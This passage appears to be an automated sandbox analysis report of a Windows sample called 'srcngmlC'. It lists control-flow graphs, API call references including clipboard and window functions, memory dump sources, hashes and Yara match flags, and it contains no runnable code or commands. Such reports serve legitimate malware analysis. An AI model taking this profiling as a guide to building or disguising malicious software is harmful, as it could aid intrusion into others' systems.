                                                                                                                                            control_flow_graph 442 355630c8-355630e3 443 355630e5-355630e8 442->443 444 3556314c-3556314f 443->444 445 355630ea-35563147 443->445 446 355631b3-355631b6 444->446 447 35563151-355631ae 444->447 445->444 449 3556321a-3556321d 446->449 450 355631b8-35563215 446->450 447->446 452 35563281-35563284 449->452 453 3556321f-3556327c 449->453 450->449 454 35563286-355632e3 452->454 455 355632e8-355632eb 452->455 453->452 454->455 460 3556334f-35563352 455->460 461 355632ed-3556334a 455->461 464 355633b6-355633b9 460->464 465 35563354-355633b1 460->465 461->460 469 3556341d-35563420 464->469 470 355633bb-35563418 464->470 465->464 473 35563422-35563476 469->473 474 3556347b-3556347e 469->474 470->469 473->474 482 355634d0-355634d3 474->482 483 35563480-355634cb 474->483 487 35563525-35563528 482->487 488 355634d5-35563520 482->488 483->482 493 3556357a-3556357d 487->493 494 3556352a-35563575 487->494 488->487 499 355635cf-355635d2 493->499 500 3556357f-355635ca 493->500 494->493 510 35563624-35563627 499->510 511 355635d4-3556361f 499->511 500->499 515 35563679-3556367c 510->515 516 35563629-35563674 510->516 511->510 521 355636ce-355636d1 515->521 522 3556367e-355636c9 515->522 516->515 527 35563723-35563726 521->527 528 355636d3-3556371e 521->528 522->521 538 35563778-3556377b 527->538 539 35563728-35563773 527->539 528->527 543 355637cd-355637d0 538->543 544 3556377d-355637c8 538->544 539->538 549 355637d2-35563826 543->549 550 3556382b-3556382e 543->550 544->543 549->550 555 35563892-35563895 550->555 556 35563830-3556388d 550->556 566 35563897-355638f4 555->566 567 355638f9-355638fc 555->567 556->555 566->567 571 35563960-35563963 567->571 572 355638fe-3556395b 567->572 577 355639c7-355639ca 571->577 578 35563965-355639c2 571->578 572->571 583 35563a2e-35563a31 577->583 584 355639cc-35563a29 577->584 578->577 594 35563a33-35563a8a 583->594 595 35563a8f-35563a92 583->595 584->583 594->595 599 35563a94-35563ae5 595->599 600 35563aea-35563aed 595->600 599->600 605 35563b45-35563b48 600->605 606 35563aef-35563b40 600->606 611 35563ba0-35563ba3 605->611 612 35563b4a-35563b9b 605->612 606->605 622 35563ba5-35563bf6 611->622 623 35563bfb-35563bfe 611->623 612->611 622->623 627 35563c56-35563c59 623->627 628 35563c00-35563c51 623->628 633 35563cb1-35563cb4 627->633 634 35563c5b-35563cac 627->634 628->627 639 35563cb6-35563d07 633->639 640 35563d0c-35563d0f 633->640 634->633 639->640 650 35563d67-35563d6a 640->650 651 35563d11-35563d62 640->651 655 35563dc2-35563dc5 650->655 656 35563d6c-35563dbd 650->656 651->650 661 35563dc7-35563e18 655->661 662 35563e1d-35563e20 655->662 656->655 661->662 667 35563e22-35563e65 662->667 668 35563e7e-35563e81 662->668 722 35563e6d-35563e79 667->722 673 35563e83-35563ed4 668->673 674 35563ed9-35563edc 668->674 673->674 683 35563f34-35563f37 674->683 684 35563ede-35563f2f 674->684 690 35563f8f-35563f91 683->690 691 35563f39-35563f8a 683->691 684->683 696 35563f93 690->696 697 35563f98-35563f9b 690->697 691->690 696->697 697->443 703 35563fa1-35563fa8 697->703 722->668
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: <dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5
                                                                                                                                            • API String ID: 0-1278165183
                                                                                                                                            • Opcode ID: 918682a8e0d93f911588d6c2a58561f2f380ec92f3599165796f0e0867f88f11
                                                                                                                                            • Instruction ID: 4cac75c2676b0678a5346985ded008fa490f023fa86cc1e05deb62ac16e81997
                                                                                                                                            • Opcode Fuzzy Hash: 918682a8e0d93f911588d6c2a58561f2f380ec92f3599165796f0e0867f88f11
                                                                                                                                            • Instruction Fuzzy Hash: CF823BB8B422148FD715DB24C5A0A2DB7B7FB89704F50896AD809A7354DF31AD83CBE1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 728 355628d8-35562901 732 35562957-35562970 728->732 733 35562903-3556291f 728->733 738 35562975-35562978 732->738 734 35562921-35562924 733->734 736 35562926-35562946 734->736 737 3556294b-3556294e 734->737 736->737 737->738 739 35562950 737->739 741 3556299f-355629a2 738->741 742 3556297a-3556299a 738->742 739->732 744 355629a4-355629c4 741->744 745 355629c9-355629cc 741->745 742->741 744->745 747 355629f3-355629f6 745->747 748 355629ce-355629ee 745->748 750 35562a1d-35562a20 747->750 751 355629f8-35562a18 747->751 748->747 755 35562a47-35562a4a 750->755 756 35562a22-35562a2e 750->756 751->750 758 35562a71-35562a74 755->758 759 35562a4c-35562a6c 755->759 948 35562a30 call 35564fd0 756->948 949 35562a30 call 35564fc0 756->949 764 35562a76-35562a96 758->764 765 35562a9b-35562a9e 758->765 759->758 764->765 767 35562ac5-35562ac8 765->767 768 35562aa0-35562ac0 765->768 774 35562aef-35562af2 767->774 775 35562aca-35562aea 767->775 768->767 772 35562a36-35562a42 772->755 777 35562af4-35562af6 774->777 778 35562b03-35562b06 774->778 775->774 789 35562afe 777->789 784 35562b2d-35562b30 778->784 785 35562b08-35562b28 778->785 787 35562b57-35562b5a 784->787 788 35562b32-35562b52 784->788 785->784 794 35562b81-35562b84 787->794 795 35562b5c-35562b7c 787->795 788->787 789->778 797 35562b86-35562ba6 794->797 798 35562bab-35562bae 794->798 795->794 797->798 802 35562bd5-35562bd8 798->802 803 35562bb0-35562bd0 798->803 806 35562bff-35562c02 802->806 807 35562bda-35562bfa 802->807 803->802 810 35562c04-35562c24 806->810 811 35562c29-35562c2c 806->811 807->806 810->811 815 35562c53-35562c56 811->815 816 35562c2e-35562c4e 811->816 820 35562c7d-35562c80 815->820 821 35562c58-35562c78 815->821 816->815 825 35562ca7-35562caa 820->825 826 35562c82-35562ca2 820->826 821->820 830 35562cd1-35562cd4 825->830 831 35562cac-35562ccc 825->831 826->825 835 35562cd6-35562cf6 830->835 836 35562cfb-35562cfe 830->836 831->830 835->836 840 35562d25-35562d28 836->840 841 35562d00-35562d0c 836->841 845 35562d4f-35562d52 840->845 846 35562d2a-35562d4a 840->846 863 35562d14-35562d20 841->863 850 35562d54-35562d74 845->850 851 35562d79-35562d7c 845->851 846->845 850->851 855 35562da3-35562da6 851->855 856 35562d7e-35562d8a 851->856 860 35562dcd-35562dd0 855->860 861 35562da8-35562dc8 855->861 876 35562d92-35562d9e 856->876 865 35562dd2 860->865 866 35562ddd-35562de0 860->866 861->860 863->840 950 35562dd2 call 355630c8 865->950 951 35562dd2 call 355630b8 865->951 870 35562e07-35562e0a 866->870 871 35562de2-35562e02 866->871 878 35562e31-35562e34 870->878 879 35562e0c-35562e2c 870->879 871->870 875 35562dd8 875->866 876->855 880 35562e36-35562e4a 878->880 881 35562e4f-35562e52 878->881 879->878 880->881 886 35562e54-35562e74 881->886 887 35562e79-35562e7c 881->887 886->887 889 35562ea3-35562ea6 887->889 890 35562e7e-35562e9e 887->890 895 35562ecd-35562ed0 889->895 896 35562ea8-35562ec8 889->896 890->889 898 35562ef7-35562efa 895->898 899 35562ed2-35562ef2 895->899 896->895 904 35562f21-35562f24 898->904 905 35562efc-35562f1c 898->905 899->898 908 35562f26-35562f46 904->908 909 35562f4b-35562f4e 904->909 905->904 908->909 913 35562f75-35562f78 909->913 914 35562f50-35562f70 909->914 917 35562f9f-35562fa2 913->917 918 35562f7a-35562f9a 913->918 914->913 923 35562fa4-35562fc4 917->923 924 35562fc9-35562fcc 917->924 918->917 923->924 927 35562ff3-35562ff5 924->927 928 35562fce-35562fee 924->928 933 35562ff7 927->933 934 35562ffc-35562fff 927->934 928->927 933->934 934->734 940 35563005-35563012 934->940 948->772 949->772 950->875 951->875
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $FT5$0IT5$0XT5$0[T5$@cT5$DDT5$HLT5$L`T5$TUT5$XET5$`RT5$d]T5$pHT5$pZT5$|KT5$|QT5$|TT5$|WT5$IT5
                                                                                                                                            • API String ID: 0-3560743003
                                                                                                                                            • Opcode ID: 89067babdf3f80be2fb4ae6c7c9aadfbf692648a323202c8726cd15f88667456
                                                                                                                                            • Instruction ID: d2b88e2ad1254ade98f9f3ce42aa0f1352db4224659050c96ae7763a02f2cd65
                                                                                                                                            • Opcode Fuzzy Hash: 89067babdf3f80be2fb4ae6c7c9aadfbf692648a323202c8726cd15f88667456
                                                                                                                                            • Instruction Fuzzy Hash: 7402F178751240CBD71A1A78E0A823C35E3BBC9297F6814AEF406DB381DE79EC439B55
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2598563909-0
                                                                                                                                            • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                                                                            • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                                                                            • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                                                                            • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                            • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3322701435-0
                                                                                                                                            • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                            • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                            • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                            • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1871 360b571a-360b57b7 GetCurrentProcess 1875 360b57b9-360b57bf 1871->1875 1876 360b57c0-360b57f4 GetCurrentThread 1871->1876 1875->1876 1877 360b57fd-360b5831 GetCurrentProcess 1876->1877 1878 360b57f6-360b57fc 1876->1878 1879 360b583a-360b5855 call 360b58f8 1877->1879 1880 360b5833-360b5839 1877->1880 1878->1877 1884 360b585b-360b588a GetCurrentThreadId 1879->1884 1880->1879 1885 360b588c-360b5892 1884->1885 1886 360b5893-360b58f5 1884->1886 1885->1886
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 360B57A6
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 360B57E3
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 360B5820
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 360B5879
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                            • Opcode ID: 92ec828d7cd80671d015633fe9e515a70ce9ddd35cef752bfe47fedf3d73bff7
                                                                                                                                            • Instruction ID: 146ab2cd8828629ae5262df1c07e5e030c5adecd911b0335cf200328237631b1
                                                                                                                                            • Opcode Fuzzy Hash: 92ec828d7cd80671d015633fe9e515a70ce9ddd35cef752bfe47fedf3d73bff7
                                                                                                                                            • Instruction Fuzzy Hash: EE5147B49003498FDB05CFA9D945B9EBFF1AF89310F20C499E059B7260D7749981CF65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1893 360b5728-360b57b7 GetCurrentProcess 1897 360b57b9-360b57bf 1893->1897 1898 360b57c0-360b57f4 GetCurrentThread 1893->1898 1897->1898 1899 360b57fd-360b5831 GetCurrentProcess 1898->1899 1900 360b57f6-360b57fc 1898->1900 1901 360b583a-360b5855 call 360b58f8 1899->1901 1902 360b5833-360b5839 1899->1902 1900->1899 1906 360b585b-360b588a GetCurrentThreadId 1901->1906 1902->1901 1907 360b588c-360b5892 1906->1907 1908 360b5893-360b58f5 1906->1908 1907->1908
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 360B57A6
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 360B57E3
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 360B5820
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 360B5879
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                            • Opcode ID: 25a5771bd84230a9439fd6b37a7f549ffdd12570fcb191e1652fafd79dddf1df
                                                                                                                                            • Instruction ID: 55361f2b999df2458ab89206327b06f76b2679ec1408928873aba1469533828e
                                                                                                                                            • Opcode Fuzzy Hash: 25a5771bd84230a9439fd6b37a7f549ffdd12570fcb191e1652fafd79dddf1df
                                                                                                                                            • Instruction Fuzzy Hash: CC5148B49003498FDB05CFAAD949B9EFBF1AF89310F20C499E419B7260D7749941CF69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                              • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1411284514-0
                                                                                                                                            • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                                                                                            • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                            • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                                                                                            • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: fcq$XPcq$\Ocq
                                                                                                                                            • API String ID: 0-3575482020
                                                                                                                                            • Opcode ID: 5b03d5b727ec2636a53c3f25bcd6def830c4d8715c6c63a0baa2e4097e852a2a
                                                                                                                                            • Instruction ID: e0982a0889b959122f9343beca41bdbf24e1aae6b3c3063d4701a72a5136613c
                                                                                                                                            • Opcode Fuzzy Hash: 5b03d5b727ec2636a53c3f25bcd6def830c4d8715c6c63a0baa2e4097e852a2a
                                                                                                                                            • Instruction Fuzzy Hash: BF619174B002089FEB159FB5C85479EBBF6FB88704F24846AE109EB395DF705C458B51
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880816110.0000000035C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35c00000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: TT5
                                                                                                                                            • API String ID: 0-2360005808
                                                                                                                                            • Opcode ID: 9d567743bd61b1e983f2f69367c1d1921e4006d8755b5b9455bc106a18ac50e7
                                                                                                                                            • Instruction ID: 1619f223bf2daca50b685c993b13d772b0eb88dc36bb1c9f933e75404dd101f1
                                                                                                                                            • Opcode Fuzzy Hash: 9d567743bd61b1e983f2f69367c1d1921e4006d8755b5b9455bc106a18ac50e7
                                                                                                                                            • Instruction Fuzzy Hash: 02412372E183558FCB00CFB9D8142AEBBF5AF89310F1489ABD404E7290DB34E845CB91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @?T5$XtT5
                                                                                                                                            • API String ID: 0-104808372
                                                                                                                                            • Opcode ID: 72e1f64439fa238dae3123b4bfd6a180fcdea548535c05e3983bf818faeeaba3
                                                                                                                                            • Instruction ID: 9342e6d3ebb139d71dd00959adbaa5ce1157652b090e8f8b42a2855b01795cf2
                                                                                                                                            • Opcode Fuzzy Hash: 72e1f64439fa238dae3123b4bfd6a180fcdea548535c05e3983bf818faeeaba3
                                                                                                                                            • Instruction Fuzzy Hash: CE913B78A101449FDB04DF68D594AADBBF6BF88355F648465E806E73A5DF30AC42CB80
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: fcq$XPcq
                                                                                                                                            • API String ID: 0-936005338
                                                                                                                                            • Opcode ID: 9a7e8b91c5cf1712d60a68be5015a9c7792630f793e720c038f724139603fab9
                                                                                                                                            • Instruction ID: a063984d0597eea82542a117aef5a89b96994e1d6ac31b21ab0a76da36e21c2a
                                                                                                                                            • Opcode Fuzzy Hash: 9a7e8b91c5cf1712d60a68be5015a9c7792630f793e720c038f724139603fab9
                                                                                                                                            • Instruction Fuzzy Hash: 0E518F75B012089FEB059FB5C954B9EBBF6BF88700F20856AE105AB395DB709C018B91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: fcq$XPcq
                                                                                                                                            • API String ID: 0-936005338
                                                                                                                                            • Opcode ID: fca21b2f12bfd4a2afc23765fad6146c283eabbdefca20219bb4ae9e4e0ac81f
                                                                                                                                            • Instruction ID: cb537de18a616cf7ec4d24c03927f8c26ffb6347ba71463f9df6f881deea3887
                                                                                                                                            • Opcode Fuzzy Hash: fca21b2f12bfd4a2afc23765fad6146c283eabbdefca20219bb4ae9e4e0ac81f
                                                                                                                                            • Instruction Fuzzy Hash: 4D416E74B002089FEB059FB5C99479EBBF2FFC8700F24856AE105AB395DB749C028B95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 360B1D22
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: e6d2b97e70da1734183c11df3ea5fc50c566066c8a4ed1312c0ff777cec5640e
                                                                                                                                            • Instruction ID: d04fb81536625d42d84a158ab176fbb7d09d3fbf7be1593c473b918fb52d005c
                                                                                                                                            • Opcode Fuzzy Hash: e6d2b97e70da1734183c11df3ea5fc50c566066c8a4ed1312c0ff777cec5640e
                                                                                                                                            • Instruction Fuzzy Hash: 8A51CDB5D003499FDB14CFA9D880ADEBFF5BF88300F24856AE819AB210D7759985CF91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 360B1D22
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: 49c7fc3c3e0f6689f56712444b6ece7cce6de2dcde35610ddaaa2b6995fa012e
                                                                                                                                            • Instruction ID: 4e48d0fc1603fd11450c70999a16241d634e6206ef3040103e3054a8385d1dd1
                                                                                                                                            • Opcode Fuzzy Hash: 49c7fc3c3e0f6689f56712444b6ece7cce6de2dcde35610ddaaa2b6995fa012e
                                                                                                                                            • Instruction Fuzzy Hash: 3741BDB5D003099FDF14CFAAD880ADEBFB5BF48350F20856AE819AB210D7759881CF91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 360B68C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallProcWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2714655100-0
                                                                                                                                            • Opcode ID: c3654521a5b8c357896e6fdbfa52aba322493e58f746afb6c507c1c3b0aaa091
                                                                                                                                            • Instruction ID: e601d681b4afba00ca3a4ad1961091dfef7f999891c43a2356aa3c5a7875d937
                                                                                                                                            • Opcode Fuzzy Hash: c3654521a5b8c357896e6fdbfa52aba322493e58f746afb6c507c1c3b0aaa091
                                                                                                                                            • Instruction Fuzzy Hash: 044125B89103458FDB00CF9AC485A9EBBF5FB89314F24C599E519AB320D770E841CFA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Clipboard
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 220874293-0
                                                                                                                                            • Opcode ID: 3db535aaa89381d59a38b5a4fa60c0d8a08e04a532e376da7615a5d2aba07cc4
                                                                                                                                            • Instruction ID: 1e66d4b5b62cba873b440037c1f7700c11346f50f5263585472e6967d5570b67
                                                                                                                                            • Opcode Fuzzy Hash: 3db535aaa89381d59a38b5a4fa60c0d8a08e04a532e376da7615a5d2aba07cc4
                                                                                                                                            • Instruction Fuzzy Hash: 913101B4D01248DFDB10CF99C985BCEBFF5AB48314F248059E408AB3A4DB74A985CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Clipboard
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 220874293-0
                                                                                                                                            • Opcode ID: ead9710df92b5113c5124234150c1c3b6dec9f3ae72a7c1689b76c8026f095cf
                                                                                                                                            • Instruction ID: a92d956033ad2bf5e37b3aa55e455104f42b29f62400bfed190cdd755c9bf9fa
